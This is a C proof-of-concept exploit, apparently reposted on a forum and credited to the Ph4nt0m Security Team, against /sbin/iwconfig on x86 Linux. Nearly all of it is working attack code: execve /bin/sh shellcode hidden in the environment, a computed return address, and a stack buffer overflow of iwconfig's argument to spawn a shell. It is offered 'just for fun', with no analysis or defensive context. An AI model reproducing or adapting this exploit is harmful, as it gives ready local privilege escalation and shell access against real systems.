Author : aXis <[Only registered and activated users can see links]>
-----------------------------------------------------------------------------
/* PST_iwconfig
/sbin/iwconfig proof of concept exploit
coded by [Only registered and activated users can see links]
Ph4nt0m Security Team
[Only registered and activated users can see links]
just for fun
*/

#include<stdio.h>
#include<string.h>
#include<unistd.h>

/* Copyright (c) Ramon de Carvalho Valle July 2003 */
/* x86/linux shellcode */

char shellcode[]= /* 24 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cltd */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80"; /* int $0x80 */


int main(int argc,char **argv){
char buf[96];
unsigned long ret;
int i;

char *prog[]={"/sbin/iwconfig",buf,NULL};
char *env[]={"HOME=/",shellcode,NULL};

ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
printf("use ret addr: 0x%x\n",ret);

memset(buf,0x41,sizeof(buf));
memcpy(&buf[92],&ret,4);

execve(prog[0],prog,env);

}